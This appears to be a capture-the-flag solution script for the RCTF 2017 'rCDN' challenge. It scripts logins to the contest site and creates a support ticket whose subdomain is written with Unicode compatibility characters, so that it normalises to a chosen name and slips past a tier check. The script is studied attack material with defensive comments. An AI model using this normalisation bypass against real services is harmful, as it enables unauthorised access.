RCTF 2017 - rCDN Solution
# coding: utf-8
"""
Unfortunately solved 20 minutes after the end of the CTF :(
"""
import re | |
import sys | |
import string | |
import requests | |
import itertools | |
target = 'http://rcdn.2017.teamrois.cn/' | |
username = 'XXXXXXXXXX' | |
password = 'XXXXXXXXXX' | |
url_login = target + 'signin' | |
url_dashboard = target + 'dashboard' | |
url_create_domain = target + 'dashboard/basic/new' | |
url_destroy_domain = target + 'dashboard/basic/destroy/{}' | |
url_tickets = target + 'support/ticket' | |
url_create_ticket = target + 'support/ticket/new' | |
proxies = {'http':'127.0.0.1:8080'} | |
def get_csrfmiddlewaretoken(url):
    """Fetch *url* with the shared session and return the CSRF token embedded in its form.

    The token is the first ``value='<64 alphanumerics>'`` attribute in the response
    body. Raises AttributeError (from ``.group``) when no such attribute is present.
    Note: unlike the other requests in this script, this GET does not use ``proxies``.
    """
    page = sess.get(url)
    match = re.search(r"value='([a-zA-Z0-9]{64})'", page.content)
    return match.group(1)
def login():
    """Authenticate the shared session.

    Returns True when the post-login page contains 'Sign out', False otherwise.
    (The module later rebinds the name ``login`` to this boolean result.)
    """
    print('[*] logging in...')
    form = {
        'csrfmiddlewaretoken': get_csrfmiddlewaretoken(url_login),
        'username': username,
        'password': password,
    }
    page = sess.post(url_login, data=form, proxies=proxies)
    return 'Sign out' in page.content
def create_domain():
    """Request a new Basic-tier subdomain and return its 8-character name.

    The application reports the outcome through the ``messages`` cookie rather than
    the response body. Returns False when the cookie carries the quota-exceeded
    message; otherwise returns the 8 alphanumerics found between two literal
    backslashes in the cookie (presumably the escaped quoting of a serialised
    message -- not verifiable from this script). Raises AttributeError if neither
    pattern is present.
    """
    print('[*] creating subdomain')
    sess.get(url_create_domain, proxies=proxies)
    flash = sess.cookies['messages']
    if 'You have exceeded maximum number of Basic CDN service' in flash:
        return False
    # The pattern matches a literal backslash on either side of the name.
    return re.search(r'\\([a-zA-Z0-9]{8})\\', flash).group(1)
def destroy_domain(subdomain):
    """Delete *subdomain* via its destroy route and return the resulting ``messages`` cookie."""
    print('[*] destroying subdomain: ' + subdomain)
    sess.get(url_destroy_domain.format(subdomain), proxies=proxies)
    return sess.cookies['messages']
def create_ticket(subdomain):
    """Open a support ticket whose subject, subdomain and message are all *subdomain*.

    Returns the rejection text when the server answers 200 with the
    'Only email support ...' notice (the Basic-tier restriction); otherwise
    returns the ``messages`` cookie set by the request.
    """
    print('[*] creating ticket for subdomain: ' + subdomain)
    form = {
        'csrfmiddlewaretoken': get_csrfmiddlewaretoken(url_create_ticket),
        'subject': subdomain,
        'subdomain': subdomain,
        'message': subdomain,
    }
    page = sess.post(url_create_ticket, data=form, proxies=proxies)
    rejected = 'Only email support is available for Basic CDN Service.'
    if page.status_code == 200 and rejected in page.content:
        return rejected
    return sess.cookies['messages']
# `global` at module scope is a no-op; kept because the helpers above read `sess` as a global.
global sess
sess = requests.session()

# Rebinds the name `login` from the function to its boolean result.
login = login()
if not login:
    print('[-] failed to login')
    sys.exit(0)

# Disabled search loop from the original author: it kept creating Basic-tier subdomains
# until one contained at least two of the strings below, then stopped. It is a bare
# string literal, so it never executes.
"""
required = [ 'hv', 'mv', 'sd', 'ss', 'ppv', 'wc', 'mc', 'md', 'dj', 'cd', 'wz', 'hg', 'erg', 'ev', 'ltd', 'hpa', 'da', 'au', 'bar', 'ov', 'pc', 'dm', 'dm2', 'dm3', 'iu', 'pa', 'na', 'ma', 'ka', 'kb', 'mb', 'gb', 'cal', 'kcal', 'pf', 'nf', 'mg', 'kg', 'hz', 'khz', 'mhz', 'ghz', 'thz', 'ml', 'dl', 'kl', 'fm', 'nm', 'mm', 'cm', 'km', 'mm2', 'cm2', 'm2', 'km2', 'mm3', 'cm3', 'm3', 'km3', 'pa', 'kpa', 'mpa', 'gpa', 'rad', 'ps', 'ns', 'ms', 'pv', 'nv', 'mv', 'kv', 'mv', 'pw', 'nw', 'mw', 'kw', 'mw', 'bq', 'cc', 'cd', 'db', 'gy', 'ha', 'hp', 'in', 'kk', 'km', 'kt', 'lm', 'ln', 'log', 'lx', 'mb', 'mil', 'mol', 'ph', 'ppm', 'pr', 'sr', 'sv', 'wb', 'gal', 'ff', 'fi', 'fl', 'ffi', 'ffl', 'st', 'st', 'no', 'sm', 'tel', 'tm', 'fax' ]
while True:
    subdomain = create_domain()
    matches = [x for x in required if x in subdomain]
    if len(matches) >= 2:
        print '[+] Subdomain: ' + subdomain
        break
    else:
        destroy_domain(subdomain)
# Found domain: 'ghzlnmdg'
"""

# U+3393 (SQUARE GHZ) and U+339A (SQUARE NM) are Unicode compatibility characters:
# under NFKC they decompose to 'GHz' and 'nm', so this value collapses to 'ghzlnmdg'
# after normalisation and lowercasing while being a different string byte-for-byte.
# The outcome suggests the ticket endpoint applies the Basic-tier check to the raw
# value but resolves the subdomain on the normalised one -- inferred, not shown here.
# The defensive fix is to canonicalise (normalise + case-fold) once at the input
# boundary and run every check and lookup on that single canonical value.
t = u'\u3393' + 'l' + u'\u339a' + 'dg'
print('[*] ' + create_ticket(t))